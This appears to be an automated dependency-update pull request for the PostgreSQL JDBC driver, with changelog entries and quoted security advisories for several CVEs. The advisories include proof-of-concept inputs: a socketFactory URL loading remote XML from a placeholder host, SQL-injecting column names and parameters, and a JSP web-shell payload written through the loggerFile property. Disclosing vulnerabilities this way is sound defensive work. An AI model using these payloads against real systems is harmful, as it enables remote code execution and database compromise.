    This has been fixed in this version fixes CVE-2022-41946 see the security advisory for more details. Reported by Jonathan Leitschuh This has been fixed in versions 42.5.1, 42.4.3 42.3.8, 42.2.27.jre7. Note there is no fix for 42.2.26.jre6. See the security advisory for work arounds.
Fixed
  • fix: make sure we select array_in from pg_catalog to avoid duplicate array_in functions fixes #Issue 2548 PR #​2552
  • fix: binary decoding of bool values PR #​2640
  • perf: improve performance of PgResultSet getByte/getShort/getInt/getLong for float-typed columns PR #​2634
  • chore: fix various spelling errors PR #​2592
  • chore: Feature/urlparser improve URLParser PR #​2641

v42.5.0

Changed

v42.4.2

Changed
  • fix: add alias to the generated getUDT() query for clarity (PR #​2553)[#​2553]
Added
Fixed
  • fix: regression with GSS. Changes introduced to support building with Java 17 caused failures Issue #​2588
  • fix: set a timeout to get the return from requesting SSL upgrade. PR #​2572
  • feat: synchronize statement executions (e.g. avoid deadlock when Connection.isValid is executed from concurrent threads)

v42.4.1

Security
  • fix: CVE-2022-31197 Fixes SQL generated in PgResultSet.refresh() to escape column identifiers so as to prevent SQL injection.
    • Previously, the column names for both key and data columns in the table were copied as-is into the generated
      SQL. This allowed a malicious table with column names that include statement terminator to be parsed and
      executed as multiple separate commands.
    • Also adds a new test class ResultSetRefreshTest to verify this change.
    • Reported by Sho Kato
Changed
  • chore: skip publishing pgjdbc-osgi-test to Central
  • chore: bump Gradle to 7.5
  • test: update JUnit to 5.8.2
Added
  • chore: added Gradle Wrapper Validation for verifying gradle-wrapper.jar
  • chore: added "permissions: contents: read" for GitHub Actions to avoid unintentional modifications by the CI
  • chore: support building pgjdbc with Java 17
  • feat: synchronize statement executions (e.g. avoid deadlock when Connection.isValid is executed from concurrent threads)

v42.4.0

Changed
  • fix: added GROUP_STARTUP_PARAMETERS boolean property to determine whether or not to group
    startup parameters in a transaction (default=false like 42.2.x) fixes Issue #​2425
    pgbouncer cannot deal with transactions in statement pooling mode PR #​2425
Fixed
  • fix: queries with up to 65535 (inclusive) parameters are supported now (previous limit was 32767)
    PR #​2525, Issue #​1311
  • fix: workaround JarIndex parsing issue by using groupId/artifactId-version directory namings.
    Regression since 42.2.13. PR #​2531, issue #​2527
  • fix: use Locale.ROOT for toUpperCase() toLowerCase() calls
  • doc: add Vladimir Sitnikov's PGP key
  • fix: return correct base type for domain from getUDTs PR #​2520 Issue #​2522
  • perf: utcTz static and renamed to UTC_TIMEZONE PR #​2519
  • doc: fix release version for #​2377 (it should be 42.3.6, not 42.3.5)

v42.3.6

Changed
Added
Fixed
  • fix: close refcursors when underlying cursor==null instead of relying on defaultRowFetchSize PR #​2377

v42.3.5

Changed
  • test: polish TimestampUtilsTest
  • chore: use GitHub Action concurrency feature to terminate CI jobs on fast PR pushes
Added
  • Added KEYS file to allow for verifying artifacts PR 2499
Fixed
  • perf: enable tcpNoDelay by default PR 2495.
    This is a regression from 42.2.x versions where tcpNoDelay defaulted to true
  • docs: fix readme.md after PR 2495 PR 2496
  • feat: targetServerType=preferPrimary connection parameter PR 2483
  • fix: revert removal of toOffsetDateTime(String timestamp) fixes Issue #​2497 PR 2501

v42.3.4

Changed
  • fix: change name of build cache PR 2471
  • feat: add support for ResultSet#getObject(OffsetTime.class) and PreparedStatement#setObject(OffsetTime.class) PR 2467
  • fix: Use non-synchronized getTimeZone in TimestampUtils PR 2451
  • docs: Fix CHANGELOG.md misformatted markdown headings PR 2461
  • docs: remove loggerLevel and loggerFile from docs and issues PR 2489
  • feat: use direct wire format -> LocalDate conversion without resorting to java.util.Date, java.util.Calendar,
    and default timezones PR 2464 fixes Issue #​2221
Added
Fixed
  • docs: Update testing documentation PR 2446
  • fix: Throw an exception if the driver cannot parse the URL instead of returning NULL fixes Issue #​2421 PR 2441
  • fix: Use PGProperty instead of the property names directly PR 2444
  • docs: update changelog, missing links at bottom and formatting PR 2460
  • fix: Remove isDeprecated from PGProperty. It was originally intended to help produce automated docs. Fixes Issue #​2479 PR 2480
  • fix: change PGInterval parseISO8601Format to support fractional second PR 2457
  • fix: GSS login to use TGT from keytab fixes Issue #​2469 PR 2470
  • fix: More test and fix for issues discovered by PR #​2476 PR #​2488

v42.3.3

Changed
  • fix: Removed loggerFile and loggerLevel configuration. While the properties still exist.
    They can no longer be used to configure the driver logging. Instead use java.util.logging
    configuration mechanisms such as logging.properties.
Added
Fixed

v42.3.2

Security
  • CVE-2022-21724 pgjdbc instantiates plugin instances based on class names provided via authenticationPluginClassName,
    sslhostnameverifier, socketFactory, sslfactory, sslpasswordcallback connection properties.
    However, the driver did not verify if the class implements the expected interface before instantiating the class. This
    would allow a malicious class to be instantiated that could execute arbitrary code from the JVM. Fixed in commit
Changed
  • perf: read in_hot_standby GUC on connection PR #​2334
  • test: materialized view privileges PR #​2209 fixes Issue #​2060
  • docs: add info about convenience maven project PR #​2407
  • docs: Document timezone reversal from POSIX to ISO PR #​2413
  • fix: we will ask the server if it supports GSS Encryption if gssEncryption
    is prefer or require PR #​2396 remove the need to have a ticket in the cache before asking the server if gss encryptions are supported
  • docs: remove Java 6 and 7 references from contributing PR #​2385
  • style: remove Java 8 / JDBC 4.2 checks PR #​2383 Remove all remaining checks whether the source is lower than Java 8
    or JDBC 4.2.
  • fix: throw SQLException for #getBoolean BIT(>1) PR #​2386 Throw SQLException instead of ClassCastException when calling
    CallableStatement#getBoolean(int) on BIT(>1).
  • style: import java.time types in more classes PR #​2382 Use imports for java.time types in all remaining classes.
  • style: import java.time types in TimestampUtils PR #​2380 Use imports for java.time types in TimestampUtils.
  • refactor: Change internal constructors to pass only connection Properties
    Changes internal constructors for PgConnection and related classes to only accept the connection properties object and
    remove the user and password arguments. Any locations that required those fields can retrieve them from the properties map.
  • test: Fix DatabaseMetadataTest to perform mview tests only on 9.3+
  • perf: read in_hot_standby GUC on connection PR #​2334
  • doc: improv doc around binary decoding of numeric data #​2331
  • Add cert key type checking to chooseClientAlias PR #​2417
Added
  • feat: Add authenticationPluginClassName option to provide passwords at runtime
    Adds authenticationPluginClassName connection property that allows end users to specify a class
    that will provide the connection passwords at runtime. Users implementing that interface must
    ensure that each invocation of the method provides a new char[] array as the contents
    will be filled with zeroes by the driver after use.Call sites within the driver have been updated to use the char[] directly wherever possible.
    This includes direct usage in the GSS authentication code paths that internally were already converting the String password into a char[] for internal usage.
    This allows configuring a connection with a password that must be generated on the fly or periodically changes. PR #​2369 original issue Issue #​2102
  • feat: add tcpNoDelay option PR #​2341 fixes Issue #​2324
  • feat: pg_service.conf and .pgpass support (jdbc:postgresql://?service=my-service) PR #​2260 fixes Issue #​2278
Fixed
  • Use local TimestampUtil in PgStatement and PgResultset for thread safety PR #​2291
    fixes Issue #​921 synchronize modification of shared calendar
  • fix: PgObject isNull() was reporting the opposite fixes Issue #​2411 PR #​2414
  • fix: default file name is ".pg_service.conf" on Windows (not "pg_service.conf") PR #​2398 fixes Issue #​2278
  • test: Fix RefCursorFetchTest on older platforms
  • fix: do not close refcursor after reading if fetchsize has been set fixes Issue #​2227 PR #​2371
  • fix: rework gss authentication to use the principal name to get the credentials fixes Issue #​2235 PR #​2352
  • fix: return getIndexInfo metadata columns in UPPER CASE PR #​2368
  • fix: Connection leak in ConnectionFactoryImpl#tryConnect PR #​2350 Issue #​2351
  • fix: Fix For IS_AUTOGENERATED Flag PR #​2348
  • fix: parsing service file tests for windows PR #​2347
  • fix: The spec says that calling close() on a closed connection is a noop. PR #​2345 fixes Issue #​2300
  • fix: add microsecond precision to getTimestamp() called on sql TIME(6) Currently, "when fetching a value of type TIME(6) through
    resultSet.getTimestamp() only ms precision is retained, the microsecond fractional digits are lost." This change will retain the microsecond
    precision when .getTimestamp() is called on TIME(6). PR #​2181 Closes Issue #​1537
  • test: materialized view privileges PR #​2209 add and drop a materialized view
    Add to TestUtil and also to DatabaseMetaData setup and teardown fixes Issue #​2060
  • fix: typo in connect.md PR #​2338 OutOfMemoryException => OutOfMemoryError
  • fix: use local TimestampUtil in PgStatement and PgResultset for thread
    safety TimestampUtil is not thread safe. It raises exceptions when multiple threads use ResultSets of one connection. PR #​2291
    fixes Issue #​921
    If PgStatement and PgResultSet use their own TimestampUtil no synchronize is needed.
  • fix: typo in CONTRIBUTING.md PR #​2332 seccion => section

v42.3.1

Changed
  • improv: Arrays in Object[] PR 2330 when an Object[] contains other arrays, treat as though it were a
    multi-dimensional array the one exception is byte[], which is not supported.
  • improv: Use jre utf-8 decoding PR 2317 Remove use of custom utf-8 decoding.
  • perf: improve performance of bytea string decoding PR 2320
    improve the parsing of bytea hex encoded string by making a lookup table for each of the valid ascii code points to the 4 bit numeric value
  • feat: intern/canonicalize common strings PR 2234
Added
Fixed
  • numeric binary decode for even 10 thousands PR #​2327 fixes Issue 2326
    binary numeric values which represented integers multiples of 10,000 from 10,000-9,990,000 were not decoded correctly
  • [typo] typo in certdir/README.md PR #​2309 certificatess => certificates
  • [typo] typo in TimestampUtils.java PR #​2314 Change Greagorian to Gregorian.
  • remove check for negative pid in cancel request. Apparently pgbouncer can send one fixes Issue 2317 PR #​2319

v42.3.0

Changed
  • No longer build for Java 6 or Java 7
  • If assumeMinServerVersion is not defined and server is at least 9.0, group startup statements into a single transaction PR #​1977
Added
  • Support for pg_service.conf file and jdbc URL syntax: "jdbc:postgresql://?service=service1".
    Resource can be provided using 1) property "-Dorg.postgresql.pgservicefile=file1" 2) environment variable PGSERVICEFILE=file2 3) default location "$HOME/.pg_service.conf" 4) environment variable PGSYSCONFDIR=dir1 looks for file "dir1/pg_service.conf".
  • Support for .pgpass file. Resource can be provided using 1) property "-Dorg.postgresql.pgpassfile=file1" 2) environment variable PGPASSFILE=file2 3) default location "$HOME/.pgpass"
Fixed
  • Rework OSGi bundle activator so it does not rely on exception message to check DataSourceFactory presence PR #​507
  • Fix database metadata getFunctions() and getProcedures() to ignore search_path when no schema pattern is specified PR #​2174
  • Fix refreshRow made the row readOnly. [PR #​2195](#​2195 Fixes Issue #​2193
  • Fix do not add double quotes to identifiers already double quoted PR #​2224 Fixes Issue #​2223
    Add a property QUOTE_RETURNING_IDENTIFIERS which determines if we put double quotes
    around identifiers that are provided in the returning array.
  • Fix Provide useful error message for empty or missing passwords for SCRAM auth PR #​2290 fixes Issue #​2288

v42.2.24

Fixed
  • Fix startup regressions caused by PR #​1949. Instead of checking all types by OID, we can return types for well known types PR #​2257
  • Backport PR #​2148
    Avoid leaking server error details through BatchUpdateException when logServerErrorDetail PR #​2254
  • Backpatch PR #​2247
    QueryExecutorImpl.receiveFastpathResult did not properly handle ParameterStatus messages.
    This in turn caused failures for some LargeObjectManager operations. Closes Issue #​2237
    Fixed by adding the missing code path, based on the existing handling in processResults. PR #​2253
  • Backpatch PR #​2242 PgDatabaseMetaData.getIndexInfo() cast operands to smallint PR#2253
    It is possible to break method PgDatabaseMetaData.getIndexInfo() by adding certain custom operators. This PR fixes it.
  • Backpatching PR #​2251 into 42.2 Clean up open connections to fix test failures on omni and appveyor
    use older syntax for COMMENT ON FUNCTION with explicit no-arg parameter parentheses as it is required on server versions before v10.
    Handle cleanup of connection creation in StatementTest, handle cleanup of privileged connection in DatabaseMetaDataTest
  • Backpatch PR #​2245 fixes case where duplicate tables are returned if there are duplicate descriptions oids are not guaranteed to be unique in the catalog PR #​2248
  • Change to updatable result set to use correctly primary or unique keys PR #​2228
    fixes issues introduced in PR #​2199 closes Issue #​2196
  • Fix NPE calling getTypeInfo when alias is null PR #​2220
  • Backpatch PR #​2217 to fix Issue #​2215. OIDs are unsigned integers and were not being handled correctly when they exceeded the size of signed integers

v42.2.23

Changed
  • Renewed the SSL keys for testing
Fixed
  • getColumnPrecision for Numeric when scale and precision not specified now returns 0 instead of 131089 fixes: Issue #​2188
  • Calling refreshRow on an updateable resultset made the row readOnly. Fixes Issue #​2193
  • results should be updateable if there is a unique index available PR#2199 Fixes Issue #​2196
  • Rework sql type gathering to use OID instead of typname.
    This does not have the issue of name shadowing / qual-names, and has the added benefit of fixing #​1948.

v42.2.22

Fixed
  • Regression caused by 4fa2d5b. Unfortunately
    due to the blocking nature of the driver and issues with seeing if there is a byte available on a blocking stream when it is encrypted
    this introduces unacceptable delays in returning from peek(). At this time there is no simple solution to this.

v42.2.21

Changed
  • Update docs to reflect deprecated DataSource API setServerName backpatch PR#2057 PR #​2105
Fixed

v42.2.20

Fixed
  • Partitioned indexes were not found fixes #​2078 PR #​2087
  • isValid() timeout should not be blocked #​1943 Cherry-picked #​2076
    The usage of setQueryTimeout(); with the same value as the setNetworkTimeout(); is blocking the current transaction timeout.
    The timeouts are blocking each other with this approach.
  • DatabaseMetaData.getTables returns columns in UPPER case as per the spec PR #​2092 fixes Issue #​830

v42.2.19

Notable Changes

  • Now the driver uses SASLprep normalization for SCRAM authentication fixing some issues with spaces in passwords.
  • If closeOnCompletion is called on an existing statement and the statement is executed a second time it will fail.
Changed
  • Perf: avoid duplicate PGStream#changeSocket calls
  • Fix: Actually close unclosed results. Previously was not closing the first unclosed result fixes #​1903 (#​1905).
    There is a small behaviour change here as a result. If closeOnCompletion is called on an existing statement and the statement
    is executed a second time it will fail.
Added
  • Verify code via forbidden-apis (jdk-internal and jdk-non-portable signatures) PR #​2012
Fixed
  • Fix Binary transfer for numeric fixes #​1935
  • Fix Allow specifying binaryTransferEnable even for those types that are not enabled by default
  • Fix: properly set cancel socket timeout (#​2044)
  • Fix "Required class information missing" when old org.jboss:jandex parses pgjdbc classes [issue 2008][#​2008]
  • Fix PGCopyInputStream returning the last row twice when reading with CopyOut API [issue 2016][#​2016]
  • Fix Connection.isValid() to not wait longer than existing network timeout PR #​2040
  • Fix Passwords with spaces (ASCII and non-ASCII) now work with SCRAM authentication (driver now uses SASLprep normalization) PR #​2052
  • Fix DatabaseMetaData.getTablePrivileges() to include views, materialized views, and foreign tables PR #​2049
  • Fix Resolve ParseError in PGtokenizer fixes #​2050
  • Fix return metadata privileges for views and foreign tables

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Mend Renovate.

This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [org.postgresql:postgresql](https://jdbc.postgresql.org) ([source](https://github.com/pgjdbc/pgjdbc)) | dependencies | minor | `42.2.18` → `42.7.11` | --- > ⚠️ **Warning** > > Some dependencies could not be looked up. Check the [Dependency Dashboard](issues/3) for more information. --- ### pgjdbc Does Not Check Class Instantiation when providing Plugin Classes BIT-postgresql-jdbc-driver-2022-21724 / [CVE-2022-21724](https://nvd.nist.gov/vuln/detail/CVE-2022-21724) / [GHSA-v7wg-cpwc-24m4](https://github.com/advisories/GHSA-v7wg-cpwc-24m4) <details> <summary>More information</summary> #### Details ##### Impact pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. Here's an example attack using an out-of-the-box class from Spring Framework: ``` DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml"); ``` The first impacted version is REL9.4.1208 (it introduced `socketFactory` connection property) #### Severity - CVSS Score: 7.0 / 10 (High) - Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H` #### References - [https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4](https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4) - [https://nvd.nist.gov/vuln/detail/CVE-2022-21724](https://nvd.nist.gov/vuln/detail/CVE-2022-21724) - [https://github.com/pgjdbc/pgjdbc/commit/f4d0ed69c0b3aae8531d83d6af4c57f22312c813](https://github.com/pgjdbc/pgjdbc/commit/f4d0ed69c0b3aae8531d83d6af4c57f22312c813) - [https://github.com/pgjdbc/pgjdbc](https://github.com/pgjdbc/pgjdbc) - [https://lists.debian.org/debian-lts-announce/2022/05/msg00027.html](https://lists.debian.org/debian-lts-announce/2022/05/msg00027.html) - [https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BVEO7BEFXPBVHSPYL3YKQWZI6DYXQLFS](https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BVEO7BEFXPBVHSPYL3YKQWZI6DYXQLFS) - [https://security.netapp.com/advisory/ntap-20220311-0005](https://security.netapp.com/advisory/ntap-20220311-0005) - [https://www.debian.org/security/2022/dsa-5196](https://www.debian.org/security/2022/dsa-5196) This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-v7wg-cpwc-24m4) and the [GitHub Advisory Database](https://github.com/github/advisory-database) ([CC-BY 4.0](https://github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### PostgreSQL JDBC Driver SQL Injection in ResultSet.refreshRow() with malicious column names BIT-postgresql-jdbc-driver-2022-31197 / [CVE-2022-31197](https://nvd.nist.gov/vuln/detail/CVE-2022-31197) / [GHSA-r38f-c4h4-hqq2](https://github.com/advisories/GHSA-r38f-c4h4-hqq2) <details> <summary>More information</summary> #### Details ##### Impact _What kind of vulnerability is it? Who is impacted?_ The PGJDBC implementation of the `java.sql.ResultRow.refreshRow()` method is not performing escaping of column names so a malicious column name that contains a statement terminator, e.g. `;`, could lead to SQL injection. This could lead to executing additional SQL commands as the application's JDBC user. User applications that do not invoke the `ResultSet.refreshRow()` method are not impacted. User application that do invoke that method are impacted if the underlying database that they are querying via their JDBC application may be under the control of an attacker. The attack requires the attacker to trick the user into executing SQL against a table name who's column names would contain the malicious SQL and subsequently invoke the `refreshRow()` method on the ResultSet. For example: ```sql CREATE TABLE refresh_row_example ( id int PRIMARY KEY, "1 FROM refresh_row_example; SELECT pg_sleep(10); SELECT * " int ); ``` This example has a table with two columns. The name of the second column is crafted to contain a statement terminator followed by additional SQL. Invoking the `ResultSet.refreshRow()` on a ResultSet that queried this table, e.g. `SELECT * FROM refresh_row`, would cause the additional SQL commands such as the `SELECT pg_sleep(10)` invocation to be executed. As the multi statement command would contain multiple results, it would not be possible for the attacker to get data directly out of this approach as the `ResultSet.refreshRow()` method would throw an exception. However, the attacker could execute any arbitrary SQL including inserting the data into another table that could then be read or any other DML / DDL statement. Note that the application's JDBC user and the schema owner need not be the same. A JDBC application that executes as a privileged user querying database schemas owned by potentially malicious less-privileged users would be vulnerable. In that situation it may be possible for the malicious user to craft a schema that causes the application to execute commands as the privileged user. ##### Patches _Has the problem been patched? What versions should users upgrade to?_ Yes, versions 42.2.26, 42.3.7, and 42.4.1 have been released with a fix. ##### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ Check that you are not using the `ResultSet.refreshRow()` method. If you are, ensure that the code that executes that method does not connect to a database that is controlled by an unauthenticated or malicious user. If your application only connects to its own database with a fixed schema with no DDL permissions, then you will not be affected by this vulnerability as it requires a maliciously crafted schema. #### Severity - CVSS Score: 7.1 / 10 (High) - Vector String: `CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H` #### References - [https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-r38f-c4h4-hqq2](https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-r38f-c4h4-hqq2) - [https://nvd.nist.gov/vuln/detail/CVE-2022-31197](https://nvd.nist.gov/vuln/detail/CVE-2022-31197) - [https://github.com/pgjdbc/pgjdbc/commit/739e599d52ad80f8dcd6efedc6157859b1a9d637](https://github.com/pgjdbc/pgjdbc/commit/739e599d52ad80f8dcd6efedc6157859b1a9d637) - [https://github.com/pgjdbc/pgjdbc](https://github.com/pgjdbc/pgjdbc) - [https://lists.debian.org/debian-lts-announce/2022/10/msg00009.html](https://lists.debian.org/debian-lts-announce/2022/10/msg00009.html) - [https://lists.debian.org/debian-lts-announce/2024/12/msg00017.html](https://lists.debian.org/debian-lts-announce/2024/12/msg00017.html) - [https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I6WHUADTZBBQLVHO4YG4XCWDGWBT4LRP](https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I6WHUADTZBBQLVHO4YG4XCWDGWBT4LRP) - [https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UTFE6SV33P5YYU2GNTQZQKQRVR3GYE4S](https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UTFE6SV33P5YYU2GNTQZQKQRVR3GYE4S) - [https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6WHUADTZBBQLVHO4YG4XCWDGWBT4LRP](https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6WHUADTZBBQLVHO4YG4XCWDGWBT4LRP) - [https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UTFE6SV33P5YYU2GNTQZQKQRVR3GYE4S](https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UTFE6SV33P5YYU2GNTQZQKQRVR3GYE4S) This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-r38f-c4h4-hqq2) and the [GitHub Advisory Database](https://github.com/github/advisory-database) ([CC-BY 4.0](https://github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### TemporaryFolder on unix-like systems does not limit access to created files BIT-postgresql-jdbc-driver-2022-41946 / [CVE-2022-41946](https://nvd.nist.gov/vuln/detail/CVE-2022-41946) / [GHSA-562r-vg33-8x8h](https://github.com/advisories/GHSA-562r-vg33-8x8h) <details> <summary>More information</summary> #### Details **Vulnerability** `PreparedStatement.setText(int, InputStream)` and `PreparedStatemet.setBytea(int, InputStream)` will create a temporary file if the InputStream is larger than 51k Example of vulnerable code: ```java String s = "some very large string greater than 51200 bytes"; PreparedStatement.setInputStream(1, new ByteArrayInputStream(s.getBytes()) ); ``` This will create a temporary file which is readable by other users on Unix like systems, but not MacOS. Impact On Unix like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system. This vulnerability does not allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability. When analyzing the impact of this vulnerability, here are the important questions to ask: Is the driver running in an environment where the OS has other untrusted users. If yes, and you answered 'yes' to question 1, this vulnerability impacts you. If no, this vulnerability does not impact you. Patches Because certain JDK file system APIs were only added in JDK 1.7, this this fix is dependent upon the version of the JDK you are using. Java 1.8 and higher users: this vulnerability is fixed in 42.2.27, 42.3.8, 42.4.3, 42.5.1 Java 1.7 users: this vulnerability is fixed in 42.2.27.jre7 Java 1.6 and lower users: no patch is available; you must use the workaround below. Workarounds If you are unable to patch, or are stuck running on Java 1.6, specifying the java.io.tmpdir system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability. References [CWE-200: Exposure of Sensitive Information to an Unauthorized Actor](https://cwe.mitre.org/data/definitions/200.html) Fix commit https://github.com/pgjdbc/pgjdbc/commit/9008dc9aade6dbfe4efafcd6872ebc55f4699cf5 Similar Vulnerabilities Google Guava - https://github.com/google/guava/issues/4011 Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945 JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824 #### Severity - CVSS Score: 4.7 / 10 (Medium) - Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N` #### References - [https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-562r-vg33-8x8h](https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-562r-vg33-8x8h) - [https://nvd.nist.gov/vuln/detail/CVE-2022-41946](https://nvd.nist.gov/vuln/detail/CVE-2022-41946) - [https://github.com/pgjdbc/pgjdbc/commit/9008dc9aade6dbfe4efafcd6872ebc55f4699cf5](https://github.com/pgjdbc/pgjdbc/commit/9008dc9aade6dbfe4efafcd6872ebc55f4699cf5) - [https://github.com/pgjdbc/pgjdbc](https://github.com/pgjdbc/pgjdbc) - [https://lists.debian.org/debian-lts-announce/2022/12/msg00003.html](https://lists.debian.org/debian-lts-announce/2022/12/msg00003.html) - [https://lists.debian.org/debian-lts-announce/2024/12/msg00017.html](https://lists.debian.org/debian-lts-announce/2024/12/msg00017.html) - [https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/25TY2L3RMVNOC7VAHJEAO7PTT6M6JJAD](https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/25TY2L3RMVNOC7VAHJEAO7PTT6M6JJAD) - [https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/25TY2L3RMVNOC7VAHJEAO7PTT6M6JJAD](https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/25TY2L3RMVNOC7VAHJEAO7PTT6M6JJAD) - [https://security.netapp.com/advisory/ntap-20240329-0003](https://security.netapp.com/advisory/ntap-20240329-0003) This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-562r-vg33-8x8h) and the [GitHub Advisory Database](https://github.com/github/advisory-database) ([CC-BY 4.0](https://github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### org.postgresql:postgresql vulnerable to SQL Injection via line comment generation BIT-postgresql-jdbc-driver-2024-1597 / [CVE-2024-1597](https://nvd.nist.gov/vuln/detail/CVE-2024-1597) / [GHSA-24rp-q3w6-vc56](https://github.com/advisories/GHSA-24rp-q3w6-vc56) <details> <summary>More information</summary> #### Details ##### Impact SQL injection is possible when using the non-default connection property `preferQueryMode=simple` in combination with application code that has a vulnerable SQL that negates a parameter value. There is no vulnerability in the driver when using the default query mode. Users that do not override the query mode are not impacted. ##### Exploitation To exploit this behavior the following conditions must be met: 1. A placeholder for a numeric value must be immediately preceded by a minus (i.e. `-`) 1. There must be a second placeholder for a string value after the first placeholder on the same line. 1. Both parameters must be user controlled. The prior behavior of the driver when operating in simple query mode would inline the negative value of the first parameter and cause the resulting line to be treated as a `--` SQL comment. That would extend to the beginning of the next parameter and cause the quoting of that parameter to be consumed by the comment line. If that string parameter includes a newline, the resulting text would appear unescaped in the resulting SQL. When operating in the default extended query mode this would not be an issue as the parameter values are sent separately to the server. Only in simple query mode the parameter values are inlined into the executed SQL causing this issue. ##### Example ```java PreparedStatement stmt = conn.prepareStatement("SELECT -?, ?"); stmt.setInt(1, -1); stmt.setString(2, "\nWHERE false --"); ResultSet rs = stmt.executeQuery(); ``` The resulting SQL when operating in simple query mode would be: ```sql SELECT --1,' WHERE false --' ``` The contents of the second parameter get injected into the command. Note how both the number of result columns and the WHERE clause of the command have changed. A more elaborate example could execute arbitrary other SQL commands. ##### Patch Problem will be patched upgrade to 42.7.2, 42.6.1, 42.5.5, 42.4.4, 42.3.9, 42.2.28, 42.2.28.jre7 The patch fixes the inlining of parameters by forcing them all to be serialized as wrapped literals. The SQL in the prior example would be transformed into: ```sql SELECT -('-1'::int4), (' WHERE false --') ``` ##### Workarounds Do not use the connection property`preferQueryMode=simple`. (*NOTE: If you do not explicitly specify a query mode then you are using the default of `extended` and are not impacted by this issue.*) #### Severity - CVSS Score: 10.0 / 10 (Critical) - Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H` #### References - [https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-24rp-q3w6-vc56](https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-24rp-q3w6-vc56) - [https://nvd.nist.gov/vuln/detail/CVE-2024-1597](https://nvd.nist.gov/vuln/detail/CVE-2024-1597) - [https://github.com/pgjdbc/pgjdbc/commit/06abfb78a627277a580d4df825f210e96a4e14ee](https://github.com/pgjdbc/pgjdbc/commit/06abfb78a627277a580d4df825f210e96a4e14ee) - [https://github.com/pgjdbc/pgjdbc/commit/93b0fcb2711d9c1e3a2a03134369738a02a58b40](https://github.com/pgjdbc/pgjdbc/commit/93b0fcb2711d9c1e3a2a03134369738a02a58b40) - [https://github.com/pgjdbc/pgjdbc](https://github.com/pgjdbc/pgjdbc) This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-24rp-q3w6-vc56) and the [GitHub Advisory Database](https://github.com/github/advisory-database) ([CC-BY 4.0](https://github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### pgjdbc Arbitrary File Write Vulnerability [GHSA-673j-qm5f-xpv8](https://github.com/advisories/GHSA-673j-qm5f-xpv8) <details> <summary>More information</summary> #### Details ##### Overview The connection properties for configuring a pgjdbc connection are not meant to be exposed to an unauthenticated attacker. While allowing an attacker to specify arbitrary connection properties could lead to a compromise of a system, that's a defect of an application that allows unauthenticated attackers that level of control. It's not the job of the pgjdbc driver to decide whether a given log file location is acceptable. End user applications that use the pgjdbc driver must ensure that filenames are valid and restrict unauthenticated attackers from being able to supply arbitrary values. That's not specific to the pgjdbc driver either, it would be true for any library that can write to the application's local file system. While we do not consider this a security issue with the driver, we have decided to remove the loggerFile and loggerLevel connection properties in the next release of the driver. Removal of those properties does not make exposing the JDBC URL or connection properties to an attacker safe and we continue to suggest that applications do not allow untrusted users to specify arbitrary connection properties. We are removing them to prevent misuse and their functionality can be delegated to java.util.logging. If you identify an application that allows remote users to specify a complete JDBC URL or properties without validating it's contents, we encourage you to notify the application owner as that may be a security defect in that specific application. ##### Impact It is possible to specify an arbitrary filename in the loggerFileName connection parameter "jdbc:postgresql://localhost:5432/test?user=test&password=test&loggerLevel=DEBUG&loggerFile=./blah.jsp&<%Runtime.getRuntime().exec(request.getParameter(\"i\"));%>" This creates a valid JSP file which could lead to a Remote Code Execution ##### 